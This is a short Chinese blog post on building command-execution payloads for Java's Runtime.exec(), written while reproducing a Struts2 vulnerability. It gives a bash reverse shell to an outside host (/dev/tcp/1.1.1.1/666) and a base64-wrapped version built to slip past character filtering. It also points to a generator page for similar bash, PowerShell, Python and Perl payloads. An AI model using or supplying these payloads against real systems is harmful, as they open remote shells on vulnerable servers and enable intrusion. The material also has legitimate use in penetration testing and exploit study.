Java Runtime.getRuntime().exec() 的那些payloads

0x01

在复现struts2遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"<>等字符出现了问题。

0x02

经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 0>&1'就可以用bash -c {echo,YmFzaCAtYyAnc2ggLWkgPiYgL2Rldi90Y3AvMS4xLjEuMS82NjYgMD4mMSc=}|{base64,-d}|{bash,-i}绕过

0x03

当然,方式有多重,这里简单的写了一个网页来生成这些payload,不仅可以生成bash,powershell,python,perl都支持。

https://x.hacking8.com/?post=293

相关推荐

发表评论

路人甲
看不清楚?点图切换

网友评论(0)